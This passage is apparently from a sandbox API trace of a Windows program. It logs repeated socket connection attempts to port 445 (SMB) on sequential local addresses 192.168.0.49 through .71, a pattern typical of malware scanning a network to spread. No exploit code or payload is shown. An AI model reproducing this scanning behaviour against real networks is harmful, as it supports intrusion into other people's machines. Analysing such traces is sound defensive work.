sin_port=0x1bd, sin_addr="192.168.0.48"), namelen=16) returned -1 [0168.040] ioctlsocket (in: s=0x504, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0168.040] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0169.052] __WSAFDIsSet (param_1=0x504, param_2=0x36ef368) returned 0 [0169.052] GetLastError () returned 0x0 [0169.052] SetLastError (dwErrCode=0x0) [0169.052] GetLastError () returned 0x0 [0169.052] SetLastError (dwErrCode=0x0) [0169.052] htonl (hostlong=0xc0a80031) returned 0x3100a8c0 [0169.052] inet_ntoa (in=0x3100a8c0) returned="192.168.0.49" [0169.052] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0169.052] socket (af=2, type=1, protocol=6) returned 0x514 [0169.053] inet_addr (cp="192.168.0.49") returned 0x3100a8c0 [0169.053] htons (hostshort=0x1bd) returned 0xbd01 [0169.053] ioctlsocket (in: s=0x514, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0169.053] connect (s=0x514, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.49"), namelen=16) returned -1 [0169.053] ioctlsocket (in: s=0x514, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0169.054] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0170.136] __WSAFDIsSet (param_1=0x514, param_2=0x36ef368) returned 0 [0170.136] GetLastError () returned 0x0 [0170.136] SetLastError (dwErrCode=0x0) [0170.136] GetLastError () returned 0x0 [0170.136] SetLastError (dwErrCode=0x0) [0170.136] htonl (hostlong=0xc0a80032) returned 0x3200a8c0 [0170.136] inet_ntoa (in=0x3200a8c0) returned="192.168.0.50" [0170.136] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0170.136] socket (af=2, type=1, protocol=6) returned 0x524 [0170.136] inet_addr (cp="192.168.0.50") returned 0x3200a8c0 [0170.136] htons (hostshort=0x1bd) returned 0xbd01 [0170.136] ioctlsocket (in: s=0x524, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0170.136] connect (s=0x524, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.50"), namelen=16) returned -1 [0170.137] ioctlsocket (in: s=0x524, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0170.137] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0171.142] __WSAFDIsSet (param_1=0x524, param_2=0x36ef368) returned 0 [0171.142] GetLastError () returned 0x0 [0171.142] SetLastError (dwErrCode=0x0) [0171.142] GetLastError () returned 0x0 [0171.142] SetLastError (dwErrCode=0x0) [0171.142] htonl (hostlong=0xc0a80033) returned 0x3300a8c0 [0171.142] inet_ntoa (in=0x3300a8c0) returned="192.168.0.51" [0171.142] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0171.143] socket (af=2, type=1, protocol=6) returned 0x528 [0171.143] inet_addr (cp="192.168.0.51") returned 0x3300a8c0 [0171.143] htons (hostshort=0x1bd) returned 0xbd01 [0171.143] ioctlsocket (in: s=0x528, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0171.143] connect (s=0x528, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.51"), namelen=16) returned -1 [0171.143] ioctlsocket (in: s=0x528, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0171.143] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0172.158] __WSAFDIsSet (param_1=0x528, param_2=0x36ef368) returned 0 [0172.158] GetLastError () returned 0x0 [0172.158] SetLastError (dwErrCode=0x0) [0172.158] GetLastError () returned 0x0 [0172.158] SetLastError (dwErrCode=0x0) [0172.158] htonl (hostlong=0xc0a80034) returned 0x3400a8c0 [0172.158] inet_ntoa (in=0x3400a8c0) returned="192.168.0.52" [0172.158] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0172.158] socket (af=2, type=1, protocol=6) returned 0x510 [0172.159] inet_addr (cp="192.168.0.52") returned 0x3400a8c0 [0172.159] htons (hostshort=0x1bd) returned 0xbd01 [0172.159] ioctlsocket (in: s=0x510, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0172.159] connect (s=0x510, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.52"), namelen=16) returned -1 [0172.159] ioctlsocket (in: s=0x510, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0172.159] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0173.172] __WSAFDIsSet (param_1=0x510, param_2=0x36ef368) returned 0 [0173.172] GetLastError () returned 0x0 [0173.172] SetLastError (dwErrCode=0x0) [0173.172] GetLastError () returned 0x0 [0173.172] SetLastError (dwErrCode=0x0) [0173.172] htonl (hostlong=0xc0a80035) returned 0x3500a8c0 [0173.172] inet_ntoa (in=0x3500a8c0) returned="192.168.0.53" [0173.172] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0173.172] socket (af=2, type=1, protocol=6) returned 0x4e8 [0173.173] inet_addr (cp="192.168.0.53") returned 0x3500a8c0 [0173.173] htons (hostshort=0x1bd) returned 0xbd01 [0173.173] ioctlsocket (in: s=0x4e8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0173.173] connect (s=0x4e8, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.53"), namelen=16) returned -1 [0173.173] ioctlsocket (in: s=0x4e8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0173.173] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0174.185] __WSAFDIsSet (param_1=0x4e8, param_2=0x36ef368) returned 0 [0174.186] GetLastError () returned 0x0 [0174.186] SetLastError (dwErrCode=0x0) [0174.186] GetLastError () returned 0x0 [0174.186] SetLastError (dwErrCode=0x0) [0174.186] htonl (hostlong=0xc0a80036) returned 0x3600a8c0 [0174.186] inet_ntoa (in=0x3600a8c0) returned="192.168.0.54" [0174.186] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0174.186] socket (af=2, type=1, protocol=6) returned 0x534 [0174.186] inet_addr (cp="192.168.0.54") returned 0x3600a8c0 [0174.186] htons (hostshort=0x1bd) returned 0xbd01 [0174.186] ioctlsocket (in: s=0x534, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0174.186] connect (s=0x534, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.54"), namelen=16) returned -1 [0174.187] ioctlsocket (in: s=0x534, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0174.187] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0175.200] __WSAFDIsSet (param_1=0x534, param_2=0x36ef368) returned 0 [0175.200] GetLastError () returned 0x0 [0175.200] SetLastError (dwErrCode=0x0) [0175.200] GetLastError () returned 0x0 [0175.200] SetLastError (dwErrCode=0x0) [0175.200] htonl (hostlong=0xc0a80037) returned 0x3700a8c0 [0175.200] inet_ntoa (in=0x3700a8c0) returned="192.168.0.55" [0175.200] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0175.200] socket (af=2, type=1, protocol=6) returned 0x53c [0175.200] inet_addr (cp="192.168.0.55") returned 0x3700a8c0 [0175.200] htons (hostshort=0x1bd) returned 0xbd01 [0175.200] ioctlsocket (in: s=0x53c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0175.201] connect (s=0x53c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.55"), namelen=16) returned -1 [0175.201] ioctlsocket (in: s=0x53c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0175.201] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0176.212] __WSAFDIsSet (param_1=0x53c, param_2=0x36ef368) returned 0 [0176.212] GetLastError () returned 0x0 [0176.213] SetLastError (dwErrCode=0x0) [0176.213] GetLastError () returned 0x0 [0176.213] SetLastError (dwErrCode=0x0) [0176.213] htonl (hostlong=0xc0a80038) returned 0x3800a8c0 [0176.213] inet_ntoa (in=0x3800a8c0) returned="192.168.0.56" [0176.213] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0176.213] socket (af=2, type=1, protocol=6) returned 0x540 [0176.213] inet_addr (cp="192.168.0.56") returned 0x3800a8c0 [0176.213] htons (hostshort=0x1bd) returned 0xbd01 [0176.213] ioctlsocket (in: s=0x540, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0176.213] connect (s=0x540, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.56"), namelen=16) returned -1 [0176.214] ioctlsocket (in: s=0x540, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0176.214] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0177.228] __WSAFDIsSet (param_1=0x540, param_2=0x36ef368) returned 0 [0177.228] GetLastError () returned 0x0 [0177.228] SetLastError (dwErrCode=0x0) [0177.228] GetLastError () returned 0x0 [0177.228] SetLastError (dwErrCode=0x0) [0177.228] htonl (hostlong=0xc0a80039) returned 0x3900a8c0 [0177.228] inet_ntoa (in=0x3900a8c0) returned="192.168.0.57" [0177.228] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0177.228] socket (af=2, type=1, protocol=6) returned 0x54c [0177.229] inet_addr (cp="192.168.0.57") returned 0x3900a8c0 [0177.229] htons (hostshort=0x1bd) returned 0xbd01 [0177.229] ioctlsocket (in: s=0x54c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0177.229] connect (s=0x54c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.57"), namelen=16) returned -1 [0177.229] ioctlsocket (in: s=0x54c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0177.229] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0178.240] __WSAFDIsSet (param_1=0x54c, param_2=0x36ef368) returned 0 [0178.240] GetLastError () returned 0x0 [0178.240] SetLastError (dwErrCode=0x0) [0178.240] GetLastError () returned 0x0 [0178.240] SetLastError (dwErrCode=0x0) [0178.241] htonl (hostlong=0xc0a8003a) returned 0x3a00a8c0 [0178.241] inet_ntoa (in=0x3a00a8c0) returned="192.168.0.58" [0178.241] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0178.241] socket (af=2, type=1, protocol=6) returned 0x350 [0178.241] inet_addr (cp="192.168.0.58") returned 0x3a00a8c0 [0178.241] htons (hostshort=0x1bd) returned 0xbd01 [0178.241] ioctlsocket (in: s=0x350, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0178.241] connect (s=0x350, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.58"), namelen=16) returned -1 [0178.241] ioctlsocket (in: s=0x350, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0178.241] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0179.256] __WSAFDIsSet (param_1=0x350, param_2=0x36ef368) returned 0 [0179.256] GetLastError () returned 0x0 [0179.256] SetLastError (dwErrCode=0x0) [0179.256] GetLastError () returned 0x0 [0179.256] SetLastError (dwErrCode=0x0) [0179.256] htonl (hostlong=0xc0a8003b) returned 0x3b00a8c0 [0179.256] inet_ntoa (in=0x3b00a8c0) returned="192.168.0.59" [0179.256] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0179.256] socket (af=2, type=1, protocol=6) returned 0x558 [0179.257] inet_addr (cp="192.168.0.59") returned 0x3b00a8c0 [0179.257] htons (hostshort=0x1bd) returned 0xbd01 [0179.257] ioctlsocket (in: s=0x558, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0179.257] connect (s=0x558, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.59"), namelen=16) returned -1 [0179.257] ioctlsocket (in: s=0x558, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0179.257] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0180.269] __WSAFDIsSet (param_1=0x558, param_2=0x36ef368) returned 0 [0180.269] GetLastError () returned 0x0 [0180.269] SetLastError (dwErrCode=0x0) [0180.269] GetLastError () returned 0x0 [0180.269] SetLastError (dwErrCode=0x0) [0180.269] htonl (hostlong=0xc0a8003c) returned 0x3c00a8c0 [0180.269] inet_ntoa (in=0x3c00a8c0) returned="192.168.0.60" [0180.269] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0180.269] socket (af=2, type=1, protocol=6) returned 0x55c [0180.269] inet_addr (cp="192.168.0.60") returned 0x3c00a8c0 [0180.269] htons (hostshort=0x1bd) returned 0xbd01 [0180.269] ioctlsocket (in: s=0x55c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0180.269] connect (s=0x55c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.60"), namelen=16) returned -1 [0180.270] ioctlsocket (in: s=0x55c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0180.270] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0181.410] __WSAFDIsSet (param_1=0x55c, param_2=0x36ef368) returned 0 [0181.410] GetLastError () returned 0x0 [0181.410] SetLastError (dwErrCode=0x0) [0181.410] GetLastError () returned 0x0 [0181.410] SetLastError (dwErrCode=0x0) [0181.410] htonl (hostlong=0xc0a8003d) returned 0x3d00a8c0 [0181.410] inet_ntoa (in=0x3d00a8c0) returned="192.168.0.61" [0181.410] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0181.410] socket (af=2, type=1, protocol=6) returned 0x568 [0181.410] inet_addr (cp="192.168.0.61") returned 0x3d00a8c0 [0181.410] htons (hostshort=0x1bd) returned 0xbd01 [0181.410] ioctlsocket (in: s=0x568, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0181.410] connect (s=0x568, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.61"), namelen=16) returned -1 [0181.410] ioctlsocket (in: s=0x568, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0181.410] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0182.421] __WSAFDIsSet (param_1=0x568, param_2=0x36ef368) returned 0 [0182.421] GetLastError () returned 0x0 [0182.421] SetLastError (dwErrCode=0x0) [0182.421] GetLastError () returned 0x0 [0182.421] SetLastError (dwErrCode=0x0) [0182.421] htonl (hostlong=0xc0a8003e) returned 0x3e00a8c0 [0182.421] inet_ntoa (in=0x3e00a8c0) returned="192.168.0.62" [0182.421] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0182.421] socket (af=2, type=1, protocol=6) returned 0x56c [0182.422] inet_addr (cp="192.168.0.62") returned 0x3e00a8c0 [0182.422] htons (hostshort=0x1bd) returned 0xbd01 [0182.422] ioctlsocket (in: s=0x56c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0182.422] connect (s=0x56c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.62"), namelen=16) returned -1 [0182.422] ioctlsocket (in: s=0x56c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0182.423] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0183.436] __WSAFDIsSet (param_1=0x56c, param_2=0x36ef368) returned 0 [0183.436] GetLastError () returned 0x0 [0183.436] SetLastError (dwErrCode=0x0) [0183.436] GetLastError () returned 0x0 [0183.436] SetLastError (dwErrCode=0x0) [0183.437] htonl (hostlong=0xc0a8003f) returned 0x3f00a8c0 [0183.437] inet_ntoa (in=0x3f00a8c0) returned="192.168.0.63" [0183.437] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0183.437] socket (af=2, type=1, protocol=6) returned 0x578 [0183.437] inet_addr (cp="192.168.0.63") returned 0x3f00a8c0 [0183.437] htons (hostshort=0x1bd) returned 0xbd01 [0183.437] ioctlsocket (in: s=0x578, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0183.437] connect (s=0x578, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.63"), namelen=16) returned -1 [0183.437] ioctlsocket (in: s=0x578, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0183.437] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0184.449] __WSAFDIsSet (param_1=0x578, param_2=0x36ef368) returned 0 [0184.449] GetLastError () returned 0x0 [0184.449] SetLastError (dwErrCode=0x0) [0184.449] GetLastError () returned 0x0 [0184.449] SetLastError (dwErrCode=0x0) [0184.450] htonl (hostlong=0xc0a80040) returned 0x4000a8c0 [0184.450] inet_ntoa (in=0x4000a8c0) returned="192.168.0.64" [0184.450] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0184.450] socket (af=2, type=1, protocol=6) returned 0x57c [0184.450] inet_addr (cp="192.168.0.64") returned 0x4000a8c0 [0184.450] htons (hostshort=0x1bd) returned 0xbd01 [0184.450] ioctlsocket (in: s=0x57c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0184.450] connect (s=0x57c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.64"), namelen=16) returned -1 [0184.451] ioctlsocket (in: s=0x57c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0184.451] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0185.465] __WSAFDIsSet (param_1=0x57c, param_2=0x36ef368) returned 0 [0185.465] GetLastError () returned 0x0 [0185.465] SetLastError (dwErrCode=0x0) [0185.465] GetLastError () returned 0x0 [0185.465] SetLastError (dwErrCode=0x0) [0185.466] htonl (hostlong=0xc0a80041) returned 0x4100a8c0 [0185.466] inet_ntoa (in=0x4100a8c0) returned="192.168.0.65" [0185.466] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0185.466] socket (af=2, type=1, protocol=6) returned 0x494 [0185.466] inet_addr (cp="192.168.0.65") returned 0x4100a8c0 [0185.466] htons (hostshort=0x1bd) returned 0xbd01 [0185.466] ioctlsocket (in: s=0x494, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0185.466] connect (s=0x494, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.65"), namelen=16) returned -1 [0185.466] ioctlsocket (in: s=0x494, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0185.466] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0186.477] __WSAFDIsSet (param_1=0x494, param_2=0x36ef368) returned 0 [0186.477] GetLastError () returned 0x0 [0186.477] SetLastError (dwErrCode=0x0) [0186.477] GetLastError () returned 0x0 [0186.477] SetLastError (dwErrCode=0x0) [0186.477] htonl (hostlong=0xc0a80042) returned 0x4200a8c0 [0186.477] inet_ntoa (in=0x4200a8c0) returned="192.168.0.66" [0186.478] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0186.478] socket (af=2, type=1, protocol=6) returned 0x58c [0186.478] inet_addr (cp="192.168.0.66") returned 0x4200a8c0 [0186.478] htons (hostshort=0x1bd) returned 0xbd01 [0186.478] ioctlsocket (in: s=0x58c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0186.478] connect (s=0x58c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.66"), namelen=16) returned -1 [0186.478] ioctlsocket (in: s=0x58c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0186.478] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0187.493] __WSAFDIsSet (param_1=0x58c, param_2=0x36ef368) returned 0 [0187.493] GetLastError () returned 0x0 [0187.493] SetLastError (dwErrCode=0x0) [0187.493] GetLastError () returned 0x0 [0187.493] SetLastError (dwErrCode=0x0) [0187.493] htonl (hostlong=0xc0a80043) returned 0x4300a8c0 [0187.493] inet_ntoa (in=0x4300a8c0) returned="192.168.0.67" [0187.493] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0187.493] socket (af=2, type=1, protocol=6) returned 0x59c [0187.493] inet_addr (cp="192.168.0.67") returned 0x4300a8c0 [0187.493] htons (hostshort=0x1bd) returned 0xbd01 [0187.493] ioctlsocket (in: s=0x59c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0187.493] connect (s=0x59c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.67"), namelen=16) returned -1 [0187.493] ioctlsocket (in: s=0x59c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0187.493] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0188.505] __WSAFDIsSet (param_1=0x59c, param_2=0x36ef368) returned 0 [0188.505] GetLastError () returned 0x0 [0188.505] SetLastError (dwErrCode=0x0) [0188.505] GetLastError () returned 0x0 [0188.505] SetLastError (dwErrCode=0x0) [0188.505] htonl (hostlong=0xc0a80044) returned 0x4400a8c0 [0188.505] inet_ntoa (in=0x4400a8c0) returned="192.168.0.68" [0188.505] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0188.505] socket (af=2, type=1, protocol=6) returned 0x590 [0188.506] inet_addr (cp="192.168.0.68") returned 0x4400a8c0 [0188.506] htons (hostshort=0x1bd) returned 0xbd01 [0188.506] ioctlsocket (in: s=0x590, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0188.506] connect (s=0x590, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.68"), namelen=16) returned -1 [0188.506] ioctlsocket (in: s=0x590, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0188.506] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0189.661] __WSAFDIsSet (param_1=0x590, param_2=0x36ef368) returned 0 [0189.661] GetLastError () returned 0x0 [0189.661] SetLastError (dwErrCode=0x0) [0189.661] GetLastError () returned 0x0 [0189.661] SetLastError (dwErrCode=0x0) [0189.661] htonl (hostlong=0xc0a80045) returned 0x4500a8c0 [0189.661] inet_ntoa (in=0x4500a8c0) returned="192.168.0.69" [0189.661] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0189.661] socket (af=2, type=1, protocol=6) returned 0x5a8 [0189.661] inet_addr (cp="192.168.0.69") returned 0x4500a8c0 [0189.661] htons (hostshort=0x1bd) returned 0xbd01 [0189.661] ioctlsocket (in: s=0x5a8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0189.661] connect (s=0x5a8, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.69"), namelen=16) returned -1 [0189.661] ioctlsocket (in: s=0x5a8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0189.661] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0191.703] __WSAFDIsSet (param_1=0x5a8, param_2=0x36ef368) returned 0 [0191.703] GetLastError () returned 0x0 [0191.703] SetLastError (dwErrCode=0x0) [0191.703] GetLastError () returned 0x0 [0191.703] SetLastError (dwErrCode=0x0) [0191.703] htonl (hostlong=0xc0a80046) returned 0x4600a8c0 [0191.703] inet_ntoa (in=0x4600a8c0) returned="192.168.0.70" [0191.703] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0191.703] socket (af=2, type=1, protocol=6) returned 0x584 [0191.704] inet_addr (cp="192.168.0.70") returned 0x4600a8c0 [0191.704] htons (hostshort=0x1bd) returned 0xbd01 [0191.704] ioctlsocket (in: s=0x584, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0191.704] connect (s=0x584, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.70"), namelen=16) returned -1 [0191.704] ioctlsocket (in: s=0x584, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0191.704] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0192.718] __WSAFDIsSet (param_1=0x584, param_2=0x36ef368) returned 0 [0192.718] GetLastError () returned 0x0 [0192.718] SetLastError (dwErrCode=0x0) [0192.718] GetLastError () returned 0x0 [0192.718] SetLastError (dwErrCode=0x0) [0192.719] htonl (hostlong=0xc0a80047) returned 0x4700a8c0 [0192.719] inet_ntoa (in=0x4700a8c0) returned="192.168.0.71" [0192.719] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0192.719] socket (af=2, type=1, protocol=6) returned 0x5b8 [0192.719] inet_addr (cp="192.168.0.71") returned 0x4700a8c0 [0192.719] htons (hostshort=0x1bd) returned 0xbd01 [0192.719] ioctlsocket (in: s=0x5b8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0192.719] connect (s=0x5b8, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.71"), namelen=16) returned -1 [0192.719] ioctlsocket (in: s=0x5b8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0192.719] select (in: nfds=0, readfds=0x0, 